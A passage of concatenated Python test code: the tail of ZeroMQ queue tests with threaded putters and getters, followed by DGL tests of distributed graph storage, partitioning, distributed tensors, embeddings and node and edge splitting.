data['put'][uid] = list()
idx = 0
while idx < n:
time.sleep(delay)
msg = '%s.%d' % (uid,idx)
putter.put(msg)
idx += 1
data['put'][uid].append(uid)
t_a = mt.Thread(target=work_put, args=[A, 'A', c_a, 0.010])
t_b = mt.Thread(target=work_put, args=[B, 'B', c_b, 0.005])
t_a.daemon = True
t_b.daemon = True
t_a.start()
t_b.start()
time.sleep(2.0)
b.stop()
g_1.stop()
g_2.stop()
# import pprint
# pprint.pprint(data)
#
# uids = list(data.keys())
# for x in uids:
# for y in uids:
# print('%s: %s: %d' % (x, y, data[x].count(y)))
#
# print(len(data['A']))
# print(len(data['B']))
# print(len(data['C']))
# print(len(data['D']))
assert(data['put']['A'].count('A') == c_a)
assert(data['put']['B'].count('B') == c_b)
assert(len(data['put']['A']) == c_a)
assert(len(data['put']['B']) == c_b)
# print(data['get']['A'].count('A'))
# print(data['get']['B'].count('B'))
# print(c_a)
# print(c_b)
assert(data['get']['A'].count('A') + data['get']['B'].count('B') == c_a + c_b)
avg = (c_a + c_b) / 2
assert(avg - 5 < data['get']['A'].count('A') + data['get']['B'].count('B') < avg + 5)
# ------------------------------------------------------------------------------
#
def test_zmq_queue_cb():
'''
same test, but use subscriber callbacks for message delivery, and only use
one subscriber
'''
data = {'put': dict(),
'get': dict()}
c_a = 2
c_b = 4
cfg = ru.Config(cfg={'uid' : 'test_queue',
'channel' : 'test',
'kind' : 'queue',
'log_level': 'error',
'path' : '/tmp/',
'sid' : 'test_sid',
'bulk_size': 0,
'stall_hwm': 1,
})
def get_msg_a(msgs):
for msg in msgs:
uid, _ = msg.split('.')
if uid not in data['get']:
data['get'][uid] = list()
data['get'][uid].append(uid)
b = ru.zmq.Queue(cfg)
b.start()
assert(b.addr_in != b.addr_out)
assert(b.addr_in == b.addr_put)
assert(b.addr_out == b.addr_get)
ru.zmq.Getter(channel=cfg['channel'], url=str(b.addr_get), cb=get_msg_a)
time.sleep(1.0)
A = ru.zmq.Putter(channel=cfg['channel'], url=str(b.addr_put))
B = ru.zmq.Putter(channel=cfg['channel'], url=str(b.addr_put))
def work_put(putter, uid, n, delay):
data['put'][uid] = list()
idx = 0
while idx < n:
time.sleep(delay)
msg = '%s.%d' % (uid,idx)
putter.put(msg)
idx += 1
data['put'][uid].append(uid)
t_a = mt.Thread(target=work_put, args=[A, 'A', c_a, 0.02])
t_b = mt.Thread(target=work_put, args=[B, 'B', c_b, 0.01])
t_a.daemon = True
t_b.daemon = True
t_a.start()
t_b.start()
time.sleep(1.0)
b.stop()
# import pprint
# pprint.pprint(data)
assert(data['put']['A'].count('A') == c_a)
assert(data['put']['B'].count('B') == c_b)
assert(len(data['put']['A']) == c_a)
assert(len(data['put']['B']) == c_b)
# print(data['get']['A'].count('A'))
# print(data['get']['B'].count('B'))
# print(c_a)
# print(c_b)
assert(data['get']['A'].count('A') + data['get']['B'].count('B') == c_a + c_b)
# ------------------------------------------------------------------------------
# run tests if called directly
if __name__ == '__main__':
test_zmq_queue()
test_zmq_queue_cb()
# ------------------------------------------------------------------------------
|
test_dist_graph_store.py
|
import os
os.environ['OMP_NUM_THREADS'] = '1'
import dgl
import sys
import numpy as np
import time
import socket
from scipy import sparse as spsp
from numpy.testing import assert_array_equal
from multiprocessing import Process, Manager, Condition, Value
import multiprocessing as mp
from dgl.heterograph_index import create_unitgraph_from_coo
from dgl.data.utils import load_graphs, save_graphs
from dgl.distributed import DistGraphServer, DistGraph
from dgl.distributed import partition_graph, load_partition, load_partition_book, node_split, edge_split
from numpy.testing import assert_almost_equal
import backend as F
import math
import unittest
import pickle
if os.name != 'nt':
import fcntl
import struct
def get_local_usable_addr():
"""Get local usable IP and port
Returns
-------
str
IP address, e.g., '192.168.8.12:50051'
"""
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
# doesn't even have to be reachable
sock.connect(('10.255.255.255', 1))
ip_addr = sock.getsockname()[0]
except ValueError:
ip_addr = '127.0.0.1'
finally:
sock.close()
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind(("", 0))
sock.listen(1)
port = sock.getsockname()[1]
sock.close()
return ip_addr + ' ' + str(port)
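# The 'ip port' string returned above is what prepare_dist() writes into
# kv_ip_config.txt, which DistGraphServer and dgl.distributed.initialize() read below.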
def create_random_graph(n):
arr = (spsp.random(n, n, density=0.001, format='coo', random_state=100) != 0).astype(np.int64)
return dgl.from_scipy(arr)
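# With n=10000 and density=0.001 the random COO matrix holds roughly
# n * n * 0.001 = 100,000 nonzeros, i.e. about 100k directed edges.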
def run_server(graph_name, server_id, server_count, num_clients, shared_mem):
g = DistGraphServer(server_id, "kv_ip_config.txt", server_count, num_clients,
'/tmp/dist_graph/{}.json'.format(graph_name),
disable_shared_mem=not shared_mem,
graph_format=['csc', 'coo'])
print('start server', server_id)
g.start()
def emb_init(shape, dtype):
return F.zeros(shape, dtype, F.cpu())
def rand_init(shape, dtype):
return F.tensor(np.random.normal(size=shape), F.float32)
def check_dist_graph_empty(g, num_clients, num_nodes, num_edges):
# Test API
assert g.number_of_nodes() == num_nodes
assert g.number_of_edges() == num_edges
# Test init node data
new_shape = (g.number_of_nodes(), 2)
g.ndata['test1'] = dgl.distributed.DistTensor(new_shape, F.int32)
nids = F.arange(0, int(g.number_of_nodes() / 2))
feats = g.ndata['test1'][nids]
assert np.all(F.asnumpy(feats) == 0)
# create a tensor and destroy a tensor and create it again.
test3 = dgl.distributed.DistTensor(new_shape, F.float32, 'test3', init_func=rand_init)
del test3
test3 = dgl.distributed.DistTensor((g.number_of_nodes(), 3), F.float32, 'test3')
del test3
# Test write data
new_feats = F.ones((len(nids), 2), F.int32, F.cpu())
g.ndata['test1'][nids] = new_feats
feats = g.ndata['test1'][nids]
assert np.all(F.asnumpy(feats) == 1)
# Test metadata operations.
assert g.node_attr_schemes()['test1'].dtype == F.int32
print('end')
def run_client_empty(graph_name, part_id, server_count, num_clients, num_nodes, num_edges):
time.sleep(5)
os.environ['DGL_NUM_SERVER'] = str(server_count)
dgl.distributed.initialize("kv_ip_config.txt")
gpb, graph_name, _, _ = load_partition_book('/tmp/dist_graph/{}.json'.format(graph_name),
part_id, None)
g = DistGraph(graph_name, gpb=gpb)
check_dist_graph_empty(g, num_clients, num_nodes, num_edges)
def check_server_client_empty(shared_mem, num_servers, num_clients):
prepare_dist()
g = create_random_graph(10000)
# Partition the graph
num_parts = 1
graph_name = 'dist_graph_test_1'
partition_graph(g, graph_name, num_parts, '/tmp/dist_graph')
# let's just test on one partition for now.
# We cannot run multiple servers and clients on the same machine.
serv_ps = []
ctx = mp.get_context('spawn')
for serv_id in range(num_servers):
p = ctx.Process(target=run_server, args=(graph_name, serv_id, num_servers,
num_clients, shared_mem))
serv_ps.append(p)
p.start()
cli_ps = []
for cli_id in range(num_clients):
print('start client', cli_id)
p = ctx.Process(target=run_client_empty, args=(graph_name, 0, num_servers, num_clients,
g.number_of_nodes(), g.number_of_edges()))
p.start()
cli_ps.append(p)
for p in cli_ps:
p.join()
for p in serv_ps:
p.join()
print('clients have terminated')
def run_client(graph_name, part_id, server_count, num_clients, num_nodes, num_edges):
time.sleep(5)
os.environ['DGL_NUM_SERVER'] = str(server_count)
dgl.distributed.initialize("kv_ip_config.txt")
gpb, graph_name, _, _ = load_partition_book('/tmp/dist_graph/{}.json'.format(graph_name),
part_id, None)
g = DistGraph(graph_name, gpb=gpb)
check_dist_graph(g, num_clients, num_nodes, num_edges)
def run_emb_client(graph_name, part_id, server_count, num_clients, num_nodes, num_edges):
time.sleep(5)
os.environ['DGL_NUM_SERVER'] = str(server_count)
dgl.distributed.initialize("kv_ip_config.txt")
gpb, graph_name, _, _ = load_partition_book('/tmp/dist_graph/{}.json'.format(graph_name),
part_id, None)
g = DistGraph(graph_name, gpb=gpb)
check_dist_emb(g, num_clients, num_nodes, num_edges)
def run_client_hierarchy(graph_name, part_id, server_count, node_mask, edge_mask, return_dict):
time.sleep(5)
os.environ['DGL_NUM_SERVER'] = str(server_count)
dgl.distributed.initialize("kv_ip_config.txt")
gpb, graph_name, _, _ = load_partition_book('/tmp/dist_graph/{}.json'.format(graph_name),
part_id, None)
g = DistGraph(graph_name, gpb=gpb)
node_mask = F.tensor(node_mask)
edge_mask = F.tensor(edge_mask)
nodes = node_split(node_mask, g.get_partition_book(), node_trainer_ids=g.ndata['trainer_id'])
edges = edge_split(edge_mask, g.get_partition_book(), edge_trainer_ids=g.edata['trainer_id'])
rank = g.rank()
return_dict[rank] = (nodes, edges)
def check_dist_emb(g, num_clients, num_nodes, num_edges):
from dgl.distributed.optim import SparseAdagrad
from dgl.distributed import DistEmbedding
# Test sparse emb
try:
emb = DistEmbedding(g.number_of_nodes(), 1, 'emb1', emb_init)
nids = F.arange(0, int(g.number_of_nodes()))
lr = 0.001
optimizer = SparseAdagrad([emb], lr=lr)
with F.record_grad():
feats = emb(nids)
assert np.all(F.asnumpy(feats) == np.zeros((len(nids), 1)))
loss = F.sum(feats + 1, 0)
loss.backward()
optimizer.step()
feats = emb(nids)
if num_clients == 1:
assert_almost_equal(F.asnumpy(feats), np.ones((len(nids), 1)) * -lr)
rest = np.setdiff1d(np.arange(g.number_of_nodes()), F.asnumpy(nids))
feats1 = emb(rest)
assert np.all(F.asnumpy(feats1) == np.zeros((len(rest), 1)))
policy = dgl.distributed.PartitionPolicy('node', g.get_partition_book())
grad_sum = dgl.distributed.DistTensor((g.number_of_nodes(), 1), F.float32,
'emb1_sum', policy)
if num_clients == 1:
assert np.all(F.asnumpy(grad_sum[nids]) == np.ones((len(nids), 1)) * num_clients)
assert np.all(F.asnumpy(grad_sum[rest]) == np.zeros((len(rest), 1)))
emb = DistEmbedding(g.number_of_nodes(), 1, 'emb2', emb_init)
with F.no_grad():
feats1 = emb(nids)
assert np.all(F.asnumpy(feats1) == 0)
optimizer = SparseAdagrad([emb], lr=lr)
with F.record_grad():
feats1 = emb(nids)
feats2 = emb(nids)
feats = F.cat([feats1, feats2], 0)
assert np.all(F.asnumpy(feats) == np.zeros((len(nids) * 2, 1)))
loss = F.sum(feats + 1, 0)
loss.backward()
optimizer.step()
with F.no_grad():
feats = emb(nids)
if num_clients == 1:
assert_almost_equal(F.asnumpy(feats), np.ones((len(nids), 1)) * 1 * -lr)
rest = np.setdiff1d(np.arange(g.number_of_nodes()), F.asnumpy(nids))
feats1 = emb(rest)
assert np.all(F.asnumpy(feats1) == np.zeros((len(rest), 1)))
except NotImplementedError as e:
pass
except Exception as e:
print(e)
sys.exit(-1)
def check_dist_graph(g, num_clients, num_nodes, num_edges):
# Test API
assert g.number_of_nodes() == num_nodes
assert g.number_of_edges() == num_edges
# Test reading node data
nids = F.arange(0, int(g.number_of_nodes() / 2))
feats1 = g.ndata['features'][nids]
feats = F.squeeze(feats1, 1)
assert np.all(F.asnumpy(feats == nids))
# Test reading edge data
eids = F.arange(0, int(g.number_of_edges() / 2))
feats1 = g.edata['features'][eids]
feats = F.squeeze(feats1, 1)
assert np.all(F.asnumpy(feats == eids))
# Test init node data
new_shape = (g.number_of_nodes(), 2)
test1 = dgl.distributed.DistTensor(new_shape, F.int32)
g.ndata['test1'] = test1
feats = g.ndata['test1'][nids]
assert np.all(F.asnumpy(feats) == 0)
assert test1.count_nonzero() == 0
# reference to a one that exists
test2 = dgl.distributed.DistTensor(new_shape, F.float32, 'test2', init_func=rand_init)
test3 = dgl.distributed.DistTensor(new_shape, F.float32, 'test2')
assert np.all(F.asnumpy(test2[nids]) == F.asnumpy(test3[nids]))
# create a tensor and destroy a tensor and create it again.
test3 = dgl.distributed.DistTensor(new_shape, F.float32, 'test3', init_func=rand_init)
del test3
test3 = dgl.distributed.DistTensor((g.number_of_nodes(), 3), F.float32, 'test3')
del test3
# add tests for anonymous distributed tensor.
test3 = dgl.distributed.DistTensor(new_shape, F.float32, init_func=rand_init)
data = test3[0:10]
test4 = dgl.distributed.DistTensor(new_shape, F.float32, init_func=rand_init)
del test3
test5 = dgl.distributed.DistTensor(new_shape, F.float32, init_func=rand_init)
assert np.sum(F.asnumpy(test5[0:10] != data)) > 0
# test a persistent tensor
test4 = dgl.distributed.DistTensor(new_shape, F.float32, 'test4', init_func=rand_init,
persistent=True)
del test4
# Recreating the deleted persistent tensor under the same name but with a different
# shape is expected to fail; check this explicitly instead of swallowing the result.
raised = False
try:
test4 = dgl.distributed.DistTensor((g.number_of_nodes(), 3), F.float32, 'test4')
except Exception:
raised = True
assert raised, 'recreating persistent tensor test4 should have raised'
# Test write data
new_feats = F.ones((len(nids), 2), F.int32, F.cpu())
g.ndata['test1'][nids] = new_feats
feats = g.ndata['test1'][nids]
assert np.all(F.asnumpy(feats) == 1)
# Test metadata operations.
assert len(g.ndata['features']) == g.number_of_nodes()
assert g.ndata['features'].shape == (g.number_of_nodes(), 1)
assert g.ndata['features'].dtype == F.int64
assert g.node_attr_schemes()['features'].dtype == F.int64
assert g.node_attr_schemes()['test1'].dtype == F.int32
assert g.node_attr_schemes()['features'].shape == (1,)
selected_nodes = np.random.randint(0, 100, size=g.number_of_nodes()) > 30
# Test node split
nodes = node_split(selected_nodes, g.get_partition_book())
nodes = F.asnumpy(nodes)
# We only have one partition, so the local nodes are basically all nodes in the graph.
local_nids = np.arange(g.number_of_nodes())
for n in nodes:
assert n in local_nids
print('end')
def check_dist_emb_server_client(shared_mem, num_servers, num_clients):
prepare_dist()
g = create_random_graph(10000)
# Partition the graph
num_parts = 1
graph_name = 'dist_graph_test_2'
g.ndata['features'] = F.unsqueeze(F.arange(0, g.number_of_nodes()), 1)
g.edata['features'] = F.unsqueeze(F.arange(0, g.number_of_edges()), 1)
partition_graph(g, graph_name, num_parts, '/tmp/dist_graph')
# let's just test on one partition for now.
# We cannot run multiple servers and clients on the same machine.
serv_ps = []
ctx = mp.get_context('spawn')
for serv_id in range(num_servers):
p = ctx.Process(target=run_server, args=(graph_name, serv_id, num_servers,
num_clients, shared_mem))
serv_ps.append(p)
p.start()
cli_ps = []
for cli_id in range(num_clients):
print('start client', cli_id)
p = ctx.Process(target=run_emb_client, args=(graph_name, 0, num_servers, num_clients,
g.number_of_nodes(),
g.number_of_edges()))
p.start()
cli_ps.append(p)
for p in cli_ps:
p.join()
assert p.exitcode == 0
for p in serv_ps:
p.join()
print('clients have terminated')
def check_server_client(shared_mem, num_servers, num_clients):
prepare_dist()
g = create_random_graph(10000)
# Partition the graph
num_parts = 1
graph_name = 'dist_graph_test_2'
g.ndata['features'] = F.unsqueeze(F.arange(0, g.number_of_nodes()), 1)
g.edata['features'] = F.unsqueeze(F.arange(0, g.number_of_edges()), 1)
partition_graph(g, graph_name, num_parts, '/tmp/dist_graph')
# let's just test on one partition for now.
# We cannot run multiple servers and clients on the same machine.
serv_ps = []
ctx = mp.get_context('spawn')
for serv_id in range(num_servers):
p = ctx.Process(target=run_server, args=(graph_name, serv_id, num_servers,
num_clients, shared_mem))
serv_ps.append(p)
p.start()
cli_ps = []
for cli_id in range(num_clients):
print('start client', cli_id)
p = ctx.Process(target=run_client, args=(graph_name, 0, num_servers, num_clients, g.number_of_nodes(),
g.number_of_edges()))
p.start()
cli_ps.append(p)
for p in cli_ps:
p.join()
for p in serv_ps:
p.join()
print('clients have terminated')
def check_server_client_hierarchy(shared_mem, num_servers, num_clients):
prepare_dist()
g = create_random_graph(10000)
# Partition the graph
num_parts = 1
graph_name = 'dist_graph_test_2'
g.ndata['features'] = F.unsqueeze(F.arange(0, g.number_of_nodes()), 1)
g.edata['features'] = F.unsqueeze(F.arange(0, g.number_of_edges()), 1)
partition_graph(g, graph_name, num_parts, '/tmp/dist_graph', num_trainers_per_machine=num_clients)
# let's just test on one partition for now.
# We cannot run multiple servers and clients on the same machine.
serv_ps = []
ctx = mp.get_context('spawn')
for serv_id in range(num_servers):
p = ctx.Process(target=run_server, args=(graph_name, serv_id, num_servers,
num_clients, shared_mem))
serv_ps.append(p)
p.start()
cli_ps = []
manager = mp.Manager()
return_dict = manager.dict()
node_mask = np.zeros((g.number_of_nodes(),), np.int32)
edge_mask = np.zeros((g.number_of_edges(),), np.int32)
nodes = np.random.choice(g.number_of_nodes(), g.number_of_nodes() // 10, replace=False)
edges = np.random.choice(g.number_of_edges(), g.number_of_edges() // 10, replace=False)
node_mask[nodes] = 1
edge_mask[edges] = 1
nodes = np.sort(nodes)
edges = np.sort(edges)
for cli_id in range(num_clients):
print('start client', cli_id)
p = ctx.Process(target=run_client_hierarchy, args=(graph_name, 0, num_servers,
node_mask, edge_mask, return_dict))
p.start()
cli_ps.append(p)
for p in cli_ps:
p.join()
for p in serv_ps:
p.join()
nodes1 = []
edges1 = []
for n, e in return_dict.values():
nodes1.append(n)
edges1.append(e)
nodes1, _ = F.sort_1d(F.cat(nodes1, 0))
edges1, _ = F.sort_1d(F.cat(edges1, 0))
assert np.all(F.asnumpy(nodes1) == nodes)
assert np.all(F.asnumpy(edges1) == edges)
print('clients have terminated')
def run_client_hetero(graph_name, part_id, server_count, num_clients, num_nodes, num_edges):
time.sleep(5)
os.environ['DGL_NUM_SERVER'] = str(server_count)
dgl.distributed.initialize("kv_ip_config.txt")
gpb, graph_name, _, _ = load_partition_book('/tmp/dist_graph/{}.json'.format(graph_name),
part_id, None)
g = DistGraph(graph_name, gpb=gpb)
check_dist_graph_hetero(g, num_clients, num_nodes, num_edges)
def create_random_hetero():
num_nodes = {'n1': 10000, 'n2': 10010, 'n3': 10020}
etypes = [('n1', 'r1', 'n2'),
('n1', 'r2', 'n3'),
('n2', 'r3', 'n3')]
edges = {}
for etype in etypes:
src_ntype, _, dst_ntype = etype
arr = spsp.random(num_nodes[src_ntype], num_nodes[dst_ntype], density=0.001, format='coo',
random_state=100)
edges[etype] = (arr.row, arr.col)
g = dgl.heterograph(edges, num_nodes)
g.nodes['n1'].data['feat'] = F.unsqueeze(F.arange(0, g.number_of_nodes('n1')), 1)
g.edges['r1'].data['feat'] = F.unsqueeze(F.arange(0, g.number_of_edges('r1')), 1)
return g
def check_dist_graph_hetero(g, num_clients, num_nodes, num_edges):
# Test API
for ntype in num_nodes:
assert ntype in g.ntypes
assert num_nodes[ntype] == g.number_of_nodes(ntype)
for etype in num_edges:
assert etype in g.etypes
assert num_edges[etype] == g.number_of_edges(etype)
etypes = [('n1', 'r1', 'n2'),
('n1', 'r2', 'n3'),
('n2', 'r3', 'n3')]
for i, etype in enumerate(g.canonical_etypes):
assert etype[0] == etypes[i][0]
assert etype[1] == etypes[i][1]
assert etype[2] == etypes[i][2]
assert g.number_of_nodes() == sum([num_nodes[ntype] for ntype in num_nodes])
assert g.number_of_edges() == sum([num_edges[etype] for etype in num_edges])
# Test reading node data
nids = F.arange(0, int(g.number_of_nodes('n1') / 2))
feats1 = g.nodes['n1'].data['feat'][nids]
feats = F.squeeze(feats1, 1)
assert np.all(F.asnumpy(feats == nids))
# Test reading edge data
eids = F.arange(0, int(g.number_of_edges('r1') / 2))
feats1 = g.edges['r1'].data['feat'][eids]
feats = F.squeeze(feats1, 1)
assert np.all(F.asnumpy(feats == eids))
# Test init node data
new_shape = (g.number_of_nodes('n1'), 2)
g.nodes['n1'].data['test1'] = dgl.distributed.DistTensor(new_shape, F.int32)
feats = g.nodes['n1'].data['test1'][nids]
assert np.all(F.asnumpy(feats) == 0)
# create a tensor and destroy a tensor and create it again.
test3 = dgl.distributed.DistTensor(new_shape, F.float32, 'test3', init_func=rand_init)
del test3
test3 = dgl.distributed.DistTensor((g.number_of_nodes('n1'), 3), F.float32, 'test3')
del test3
# add tests for anonymous distributed tensor.
test3 = dgl.distributed.DistTensor(new_shape, F.float32, init_func=rand_init)
data = test3[0:10]
test4 = dgl.distributed.DistTensor(new_shape, F.float32, init_func=rand_init)
del test3
test5 = dgl.distributed.DistTensor(new_shape, F.float32, init_func=rand_init)
assert np.sum(F.asnumpy(test5[0:10] != data)) > 0
# test a persistent tensor
test4 = dgl.distributed.DistTensor(new_shape, F.float32, 'test4', init_func=rand_init,
persistent=True)
del test4
# Recreating the deleted persistent tensor under the same name but with a different
# shape is expected to fail; check this explicitly instead of swallowing the result.
raised = False
try:
test4 = dgl.distributed.DistTensor((g.number_of_nodes('n1'), 3), F.float32, 'test4')
except Exception:
raised = True
assert raised, 'recreating persistent tensor test4 should have raised'
# Test write data
new_feats = F.ones((len(nids), 2), F.int32, F.cpu())
g.nodes['n1'].data['test1'][nids] = new_feats
feats = g.nodes['n1'].data['test1'][nids]
assert np.all(F.asnumpy(feats) == 1)
# Test metadata operations.
assert len(g.nodes['n1'].data['feat']) == g.number_of_nodes('n1')
assert g.nodes['n1'].data['feat'].shape == (g.number_of_nodes('n1'), 1)
assert g.nodes['n1'].data['feat'].dtype == F.int64
selected_nodes = np.random.randint(0, 100, size=g.number_of_nodes('n1')) > 30
# Test node split
nodes = node_split(selected_nodes, g.get_partition_book(), ntype='n1')
nodes = F.asnumpy(nodes)
# We only have one partition, so the local nodes are basically all nodes in the graph.
local_nids = np.arange(g.number_of_nodes('n1'))
for n in nodes:
assert n in local_nids
print('end')
def check_server_client_hetero(shared_mem, num_servers, num_clients):
prepare_dist()
g = create_random_hetero()
# Partition the graph
num_parts = 1
graph_name = 'dist_graph_test_3'
partition_graph(g, graph_name, num_parts, '/tmp/dist_graph')
# let's just test on one partition for now.
# We cannot run multiple servers and clients on the same machine.
serv_ps = []
ctx = mp.get_context('spawn')
for serv_id in range(num_servers):
p = ctx.Process(target=run_server, args=(graph_name, serv_id, num_servers,
num_clients, shared_mem))
serv_ps.append(p)
p.start()
cli_ps = []
num_nodes = {ntype: g.number_of_nodes(ntype) for ntype in g.ntypes}
num_edges = {etype: g.number_of_edges(etype) for etype in g.etypes}
for cli_id in range(num_clients):
print('start client', cli_id)
p = ctx.Process(target=run_client_hetero, args=(graph_name, 0, num_servers, num_clients, num_nodes,
num_edges))
p.start()
cli_ps.append(p)
for p in cli_ps:
p.join()
for p in serv_ps:
p.join()
print('clients have terminated')
@unittest.skipIf(os.name == 'nt', reason='Do not support windows yet')
@unittest.skipIf(dgl.backend.backend_name == "tensorflow", reason="TF doesn't support some of operations in DistGraph")
@unittest.skipIf(dgl.backend.backend_name == "mxnet", reason="Turn off Mxnet support")
def test_server_client():
os.environ['DGL_DIST_MODE'] = 'distributed'
check_server_client_hierarchy(False, 1, 4)
check_server_client_empty(True, 1, 1)
check_server_client_hetero(True, 1, 1)
check_server_client_hetero(False, 1, 1)
check_server_client(True, 1, 1)
check_server_client(False, 1, 1)
check_server_client(True, 2, 2)
@unittest.skipIf(os.name == 'nt', reason='Do not support windows yet')
@unittest.skipIf(dgl.backend.backend_name == "tensorflow", reason="TF doesn't support distributed DistEmbedding")
@unittest.skipIf(dgl.backend.backend_name == "mxnet", reason="Mxnet doesn't support distributed DistEmbedding")
def test_dist_emb_server_client():
os.environ['DGL_DIST_MODE'] = 'distributed'
check_dist_emb_server_client(True, 1, 1)
check_dist_emb_server_client(False, 1, 1)
check_dist_emb_server_client(True, 2, 2)
@unittest.skipIf(dgl.backend.backend_name == "tensorflow", reason="TF doesn't support some of operations in DistGraph")
@unittest.skipIf(dgl.backend.backend_name == "mxnet", reason="Turn off Mxnet support")
def test_standalone():
os.environ['DGL_DIST_MODE'] = 'standalone'
g = create_random_graph(10000)
# Partition the graph
num_parts = 1
graph_name = 'dist_graph_test_3'
g.ndata['features'] = F.unsqueeze(F.arange(0, g.number_of_nodes()), 1)
g.edata['features'] = F.unsqueeze(F.arange(0, g.number_of_edges()), 1)
partition_graph(g, graph_name, num_parts, '/tmp/dist_graph')
dgl.distributed.initialize("kv_ip_config.txt")
dist_g = DistGraph(graph_name, part_config='/tmp/dist_graph/{}.json'.format(graph_name))
check_dist_graph(dist_g, 1, g.number_of_nodes(), g.number_of_edges())
dgl.distributed.exit_client() # this is needed since there are two tests here in one process
@unittest.skipIf(dgl.backend.backend_name == "tensorflow", reason="TF doesn't support distributed DistEmbedding")
@unittest.skipIf(dgl.backend.backend_name == "mxnet", reason="Mxnet doesn't support distributed DistEmbedding")
def test_standalone_node_emb():
os.environ['DGL_DIST_MODE'] = 'standalone'
g = create_random_graph(10000)
# Partition the graph
num_parts = 1
graph_name = 'dist_graph_test_3'
g.ndata['features'] = F.unsqueeze(F.arange(0, g.number_of_nodes()), 1)
g.edata['features'] = F.unsqueeze(F.arange(0, g.number_of_edges()), 1)
partition_graph(g, graph_name, num_parts, '/tmp/dist_graph')
dgl.distributed.initialize("kv_ip_config.txt")
dist_g = DistGraph(graph_name, part_config='/tmp/dist_graph/{}.json'.format(graph_name))
check_dist_emb(dist_g, 1, g.number_of_nodes(), g.number_of_edges())
dgl.distributed.exit_client() # this is needed since there are two tests here in one process
@unittest.skipIf(os.name == 'nt', reason='Do not support windows yet')
def test_split():
#prepare_dist()
g = create_random_graph(10000)
num_parts = 4
num_hops = 2
partition_graph(g, 'dist_graph_test', num_parts, '/tmp/dist_graph', num_hops=num_hops, part_method='metis')
node_mask = np.random.randint(0, 100, size=g.number_of_nodes()) > 30
edge_mask = np.random.randint(0, 100, size=g.number_of_edges()) > 30
selected_nodes = np.nonzero(node_mask)[0]
selected_edges = np.nonzero(edge_mask)[0]
# The code now collects the roles of all client processes and uses that information
# to determine how to split the workloads. The code below simulates the multi-client
# use case.
def set_roles(num_clients):
dgl.distributed.role.CUR_ROLE = 'default'
dgl.distributed.role.GLOBAL_RANK = {i:i for i in range(num_clients)}
dgl.distributed.role.PER_ROLE_RANK['default'] = {i:i for i in range(num_clients)}
for i in range(num_parts):
set_roles(num_parts)
part_g, node_feats, edge_feats, gpb, _, _, _ = load_partition('/tmp/dist_graph/dist_graph_test.json', i)
local_nids = F.nonzero_1d(part_g.ndata['inner_node'])
local_nids = F.gather_row(part_g.ndata[dgl.NID], local_nids)
nodes1 = np.intersect1d(selected_nodes, F.asnumpy(local_nids))
nodes2 = node_split(node_mask, gpb, rank=i, force_even=False)
assert np.all(np.sort(nodes1) == np.sort(F.asnumpy(nodes2)))
local_nids = F.asnumpy(local_nids)
for n in nodes1:
assert n in local_nids
set_roles(num_parts * 2)
nodes3 = node_split(node_mask, gpb, rank=i * 2, force_even=False)
nodes4 = node_split(node_mask, gpb, rank=i * 2 + 1, force_even=False)
nodes5 = F.cat([nodes3, nodes4], 0)
assert np.all(np.sort(nodes1) == np.sort(F.asnumpy(nodes5)))
set_roles(num_parts)
local_eids = F.nonzero_1d(part_g.edata['inner_edge'])
local_eids = F.gather_row(part_g.edata[dgl.EID], local_eids)
edges1 = np.intersect1d(selected_edges, F.asnumpy(local_eids))
edges2 = edge_split(edge_mask, gpb, rank=i, force_even=False)
assert np.all(np.sort(edges1) == np.sort(F.asnumpy(edges2)))
local_eids = F.asnumpy(local_eids)
for e in edges1:
assert e in local_eids
set_roles(num_parts * 2)
edges3 = edge_split(edge_mask, gpb, rank=i * 2, force_even=False)
edges4 = edge_split(edge_mask, gpb, rank=i * 2 + 1, force_even=False)
edges5 = F.cat([edges3, edges4], 0)
assert np.all(np.sort(edges1) == np.sort(F.asnumpy(edges5)))
@unittest.skipIf(os.name == 'nt', reason='Do not support windows yet')
def test_split_even():
#prepare_dist(1)
g = create_random_graph(10000)
num_parts = 4
num_hops = 2
partition_graph(g, 'dist_graph_test', num_parts, '/tmp/dist_graph', num_hops=num_hops, part_method='metis')
node_mask = np.random.randint(0, 100, size=g.number_of_nodes()) > 30
edge_mask = np.random.randint(0, 100, size=g.number_of_edges()) > 30
selected_nodes = np.nonzero(node_mask)[0]
selected_edges = np.nonzero(edge_mask)[0]
all_nodes1 = []
all_nodes2 = []
all_edges1 = []
all_edges2 = []
    # The code now collects the roles of all client processes and uses the information
    # to determine how to split the workloads. Here we simulate the multi-client
    # use case.
def set_roles(num_clients):
dgl.distributed.role.CUR_ROLE = 'default'
dgl.distributed.role.GLOBAL_RANK = {i:i for i in range(num_clients)}
dgl.distributed.role.PER_ROLE_RANK['default'] = {i:i for i in range(num_clients)}
for i in range(num_parts):
set_roles(num_parts)
part_g, node_feats, edge_feats, gpb, _, _, _ = load_partition('/tmp/dist_graph/dist_graph_test.json', i)
local_nids = F.nonzero_1d(part_g.ndata['inner_node'])
local_nids = F.gather_row(part_g.ndata[dgl.NID], local_nids)
nodes = node_split(node_mask, gpb, rank=i, force_even=True)
all_nodes1.append(nodes)
subset = np.intersect1d(F.asnumpy(nodes), F.asnumpy(local_nids))
print('part {} get {} nodes and {} are in the partition'.format(i, len(nodes), len(subset)))
set_roles(num_parts * 2)
nodes1 = node_split(node_mask, gpb, rank=i * 2, force_even=True)
nodes2 = node_split(node_mask, gpb, rank=i * 2 + 1, force_even=True)
nodes3, _ = F.sort_1d(F.cat([nodes1, nodes2], 0))
all_nodes2.append(nodes3)
subset = np.intersect1d(F.asnumpy(nodes), F.asnumpy(nodes3))
print('intersection has', len(subset))
set_roles(num_parts)
local_eids = F.nonzero_1d(part_g.edata['inner_edge'])
local_eids = F.gather_row(part_g.edata[dgl.EID], local_eids)
edges = edge_split(edge_mask, gpb, rank=i, force_even=True)
all_edges1.append(edges)
subset = np.intersect1d(F.asnumpy(edges), F.asnumpy(local_eids))
print('part {} get {} edges and {} are in the partition'.format(i, len(edges), len(subset)))
set_roles(num_parts * 2)
edges1 = edge_split(edge_mask, gpb, rank=i * 2, force_even=True)
edges2 = edge_split(edge_mask, gpb, rank=i * 2 + 1, force_even=True)
edges3, _ = F.sort_1d(F.cat([edges1, edges2], 0))
all_edges2.append(edges3)
subset = np.intersect1d(F.asnumpy(edges), F.asnumpy(edges3))
print('intersection has', len(subset))
all_nodes1 = F.cat(all_nodes1, 0)
all_edges1 = F.cat(all_edges1, 0)
all_nodes2 = F.cat(all_nodes2, 0)
all_edges2 = F.cat(all_edges2, 0)
all_nodes = np.nonzero(node_mask)[0]
